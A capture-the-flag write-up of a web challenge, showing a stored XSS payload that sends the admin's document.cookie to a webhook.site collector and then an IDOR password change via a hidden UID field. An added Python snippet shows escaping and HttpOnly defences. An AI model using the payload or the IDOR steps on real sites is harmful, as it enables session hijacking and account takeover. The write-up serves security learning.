Capture The Flag

1️⃣ Web 300: Kryptos Support

During enumeration I found a support form you can submit tickets through, and a separate page that is a login portal.
I submitted some test content and got this response:
The response hinted at a possible XSS attack, which could let me capture an admin's cookies/session. I submitted a crafted XSS payload that reports the cookie back to https://webhook.site:
<script>
document.write('<img src="https://webhook.site/4805b428-e4e9-4754-9ff1-74f3b03e040d?c='+document.cookie+'" />');
</script>
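The payload above only works because the ticket text is rendered into the admin page unescaped and the session cookie is readable from JavaScript. The following is an added example (not part of the original writeup or the challenge's own code) showing both defences side by side: the vulnerable rendering next to an HTML-escaped one, and a session cookie issued with HttpOnly so document.cookie cannot read it. The ticket content and the EXAMPLE-WEBHOOK.invalid URL are constructed placeholders.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample ticket: the shape of payload described in the writeup,
# with a placeholder collector URL instead of a real webhook.
MALICIOUS_TICKET = (
    "<script>document.write('<img src=\"https://EXAMPLE-WEBHOOK.invalid/?c='"
    "+document.cookie+'\" />');</script>"
)


def render_ticket_unsafe(content: str) -> str:
    """Vulnerable: ticket text is concatenated straight into the admin page,
    so a <script> tag submitted by a visitor runs in the admin's browser."""
    return f"<div class='ticket'>{content}</div>"


def render_ticket_safe(content: str) -> str:
    """Hardened: HTML-escape user content so <, >, & and quotes become entities
    and the browser treats the ticket as text, not markup."""
    return f"<div class='ticket'>{html.escape(content, quote=True)}</div>"


def session_cookie_header(token: str, secure: bool = True) -> str:
    """Build the Set-Cookie value for a session cookie that JavaScript cannot read.
    HttpOnly keeps it out of document.cookie even if a script does run;
    SameSite=Lax and Secure limit cross-site and plaintext exposure."""
    jar = SimpleCookie()
    jar["session"] = token
    jar["session"]["httponly"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    if secure:
        jar["session"]["secure"] = True
    return jar.output(header="").strip()


def contains_active_script(rendered_html: str) -> bool:
    """Crude indicator used only to contrast the two renderers: does a raw
    <script> tag survive into the HTML the admin will load?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print("unsafe :", render_ticket_unsafe(MALICIOUS_TICKET))
    print("safe   :", render_ticket_safe(MALICIOUS_TICKET))
    print("cookie :", session_cookie_header("abc123"))
```

Escaping on output fixes the stored XSS itself; HttpOnly is defence in depth that would have stopped this particular cookie theft even with the XSS present, which is why a review of the challenge would flag both.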
Now I have the session cookie.
I installed a cookie editor and loaded the session cookie obtained from the XSS attack.
That redirected me to the admin panel. I didn't find any input fields or file uploads there, just the ticket I had submitted.
Checking the links, I found a change-password form. I tried to change the password of the current account, and that's when I noticed the account I had compromised was a moderator.
So I thought there might be an admin account for this application. Next I used the browser's inspect-element function to look for hidden fields, and that's where I found the UID.
I changed the value to 1, supplied my chosen password and clicked submit, then I received the message below:
I logged in as admin with my chosen password and was automatically redirected to the home page, which showed the flag.
Conclusion: the application is vulnerable to persistent (stored) XSS and to IDOR (Insecure Direct Object Reference).